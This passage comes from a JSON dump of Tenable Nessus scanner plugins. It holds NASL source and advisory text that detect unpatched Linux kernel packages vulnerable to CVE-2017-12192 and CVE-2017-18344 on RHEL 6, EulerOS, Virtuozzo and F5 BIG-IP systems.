reference:\"kernel-headers-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-debuginfo-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-debuginfo-2.6.32-754.30.2.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : 
SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:20:45", "description": "The remote Redhat Enterprise Linux 6 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:2430 advisory.\n\n - kernel: NULL pointer dereference due to KEYCTL_READ on negative key (CVE-2017-12192)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-06-10T00:00:00", "type": "nessus", "title": "RHEL 6 : kernel (RHSA-2020:2430)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12192"], "modified": "2023-05-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:rhel_els:6", "cpe:/o:redhat:rhel_eus:6.0", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "p-cpe:/a:redhat:enterprise_linux:kernel-bootwrapper", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:python-perf"], "id": "REDHAT-RHSA-2020-2430.NASL", "href": "https://www.tenable.com/plugins/nessus/137305", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2430. 
The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137305);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/25\");\n\n script_cve_id(\"CVE-2017-12192\");\n script_bugtraq_id(101293);\n script_xref(name:\"RHSA\", value:\"2020:2430\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2020:2430)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 6 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:2430 advisory.\n\n - kernel: NULL pointer dereference due to KEYCTL_READ on negative key (CVE-2017-12192)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2017-12192\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:2430\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1493435\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12192\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(476);\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2017/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_els:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-bootwrapper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and 
is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\ninclude('ksplice.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '6')) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nif (get_one_kb_item('Host/ksplice/kernel-cves'))\n{\n rm_kb_item(name:'Host/uptrack-uname-r');\n var cve_list = make_list('CVE-2017-12192');\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for RHSA-2020:2430');\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/power/6/6Server/ppc64/debug',\n 'content/dist/rhel/power/6/6Server/ppc64/hpn/debug',\n 'content/dist/rhel/power/6/6Server/ppc64/hpn/os',\n 'content/dist/rhel/power/6/6Server/ppc64/hpn/source/SRPMS',\n 'content/dist/rhel/power/6/6Server/ppc64/optional/debug',\n 'content/dist/rhel/power/6/6Server/ppc64/optional/os',\n 
'content/dist/rhel/power/6/6Server/ppc64/optional/source/SRPMS',\n 'content/dist/rhel/power/6/6Server/ppc64/os',\n 'content/dist/rhel/power/6/6Server/ppc64/sap/debug',\n 'content/dist/rhel/power/6/6Server/ppc64/sap/os',\n 'content/dist/rhel/power/6/6Server/ppc64/sap/source/SRPMS',\n 'content/dist/rhel/power/6/6Server/ppc64/source/SRPMS',\n 'content/dist/rhel/power/6/6Server/ppc64/supplementary/debug',\n 'content/dist/rhel/power/6/6Server/ppc64/supplementary/os',\n 'content/dist/rhel/power/6/6Server/ppc64/supplementary/source/SRPMS',\n 'content/dist/rhel/system-z/6/6Server/s390x/debug',\n 'content/dist/rhel/system-z/6/6Server/s390x/optional/debug',\n 'content/dist/rhel/system-z/6/6Server/s390x/optional/os',\n 'content/dist/rhel/system-z/6/6Server/s390x/optional/source/SRPMS',\n 'content/dist/rhel/system-z/6/6Server/s390x/os',\n 'content/dist/rhel/system-z/6/6Server/s390x/sap/debug',\n 'content/dist/rhel/system-z/6/6Server/s390x/sap/os',\n 'content/dist/rhel/system-z/6/6Server/s390x/sap/source/SRPMS',\n 'content/dist/rhel/system-z/6/6Server/s390x/source/SRPMS',\n 'content/dist/rhel/system-z/6/6Server/s390x/supplementary/debug',\n 'content/dist/rhel/system-z/6/6Server/s390x/supplementary/os',\n 'content/dist/rhel/system-z/6/6Server/s390x/supplementary/source/SRPMS',\n 'content/els/rhel/system-z/6/6Server/s390x/debug',\n 'content/els/rhel/system-z/6/6Server/s390x/optional/debug',\n 'content/els/rhel/system-z/6/6Server/s390x/optional/os',\n 'content/els/rhel/system-z/6/6Server/s390x/optional/source/SRPMS',\n 'content/els/rhel/system-z/6/6Server/s390x/os',\n 'content/els/rhel/system-z/6/6Server/s390x/sap/debug',\n 'content/els/rhel/system-z/6/6Server/s390x/sap/os',\n 'content/els/rhel/system-z/6/6Server/s390x/sap/source/SRPMS',\n 'content/els/rhel/system-z/6/6Server/s390x/source/SRPMS',\n 'content/fastrack/rhel/power/6/ppc64/debug',\n 'content/fastrack/rhel/power/6/ppc64/optional/debug',\n 'content/fastrack/rhel/power/6/ppc64/optional/os',\n 
'content/fastrack/rhel/power/6/ppc64/optional/source/SRPMS',\n 'content/fastrack/rhel/power/6/ppc64/os',\n 'content/fastrack/rhel/power/6/ppc64/source/SRPMS',\n 'content/fastrack/rhel/system-z/6/s390x/debug',\n 'content/fastrack/rhel/system-z/6/s390x/optional/debug',\n 'content/fastrack/rhel/system-z/6/s390x/optional/os',\n 'content/fastrack/rhel/system-z/6/s390x/optional/source/SRPMS',\n 'content/fastrack/rhel/system-z/6/s390x/os',\n 'content/fastrack/rhel/system-z/6/s390x/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'kernel-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-abi-whitelists-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-bootwrapper-2.6.32-754.30.2.el6', 'cpu':'ppc64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-debug-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-debug-devel-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-devel-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-firmware-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-headers-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-kdump-2.6.32-754.30.2.el6', 'cpu':'s390x', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-kdump-devel-2.6.32-754.30.2.el6', 'cpu':'s390x', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'perf-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python-perf-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if 
(!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n var enterprise_linux_flag = rhel_repo_urls_has_content_dist_rhel(repo_urls:repo_relative_urls);\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp']) && !enterprise_linux_flag) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kernel / kernel-abi-whitelists / kernel-bootwrapper / 
kernel-debug / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:42:23", "description": "According to the version of the kernel packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerability :\n\n - The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel doesn't properly validate the sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function.(CVE-2017-18344)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-11-21T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.5.2 : kernel (EulerOS-SA-2018-1369)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-18344"], "modified": "2021-04-08T00:00:00", "cpe": ["cpe:/o:huawei:euleros:uvp:2.5.2", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel"], "id": "EULEROS_SA-2018-1369.NASL", "href": "https://www.tenable.com/plugins/nessus/119060", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119060);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/08\");\n\n script_cve_id(\n \"CVE-2017-18344\"\n );\n\n script_name(english:\"EulerOS Virtualization 2.5.2 : kernel (EulerOS-SA-2018-1369)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote 
EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - The timer_create syscall implementation in\n kernel/time/posix-timers.c in the Linux kernel doesn't\n properly validate the sigevent-i1/4zsigev_notify field,\n which leads to out-of-bounds access in the show_timer\n function.(CVE-2017-18344)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1369\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?db4e78e3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.5.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.5.2\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.5.2\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 
/ x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-514.44.5.10_103\",\n \"kernel-devel-3.10.0-514.44.5.10_103\",\n \"kernel-headers-3.10.0-514.44.5.10_103\",\n \"kernel-tools-3.10.0-514.44.5.10_103\",\n \"kernel-tools-libs-3.10.0-514.44.5.10_103\",\n \"kernel-tools-libs-devel-3.10.0-514.44.5.10_103\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T14:14:22", "description": "According to the version of the vzkernel package and the readykernel-patch installed, the Virtuozzo installation on the remote host is affected by the following vulnerability :\n\n - The implementation of timer_create system call in the Linux kernel before 4.14.8 doesn't properly validate the sigevent::sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). 
This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-08-10T00:00:00", "type": "nessus", "title": "Virtuozzo 7 : readykernel-patch (VZA-2018-052)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-18344"], "modified": "2021-03-08T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:readykernel", "cpe:/o:virtuozzo:virtuozzo:7"], "id": "VIRTUOZZO_VZA-2018-052.NASL", "href": "https://www.tenable.com/plugins/nessus/111642", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111642);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/08\");\n\n script_cve_id(\n \"CVE-2017-18344\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2018-052)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerability :\n\n - The implementation of timer_create system call in the\n Linux kernel before 4.14.8 doesn't properly validate\n the sigevent::sigev_notify field, which leads to\n out-of-bounds access in the show_timer function (called\n when /proc/$PID/timers is read). 
This allows userspace\n applications to read arbitrary kernel memory (on a\n kernel built with CONFIG_POSIX_TIMERS and\n CONFIG_CHECKPOINT_RESTORE).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2951184\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.openwall.com/lists/oss-security/2018/08/02/3\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-63.3-56.0-3.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2fbad0c6\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-862.9.1.vz7.63.3\",\n \"patch\",\"readykernel-patch-63.3-56.0-3.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_NOTE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:55", "description": "The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel before 4.14.8 doesn't properly validate the sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). 
This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE).\n(CVE-2017-18344)\n\nImpact\n\nA local attacker may use this vulnerability to expose sensitive information or cause a denial of service (DoS), making the system unresponsive.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Linux kernel vulnerability (K07020416)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-18344"], "modified": "2022-10-28T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", 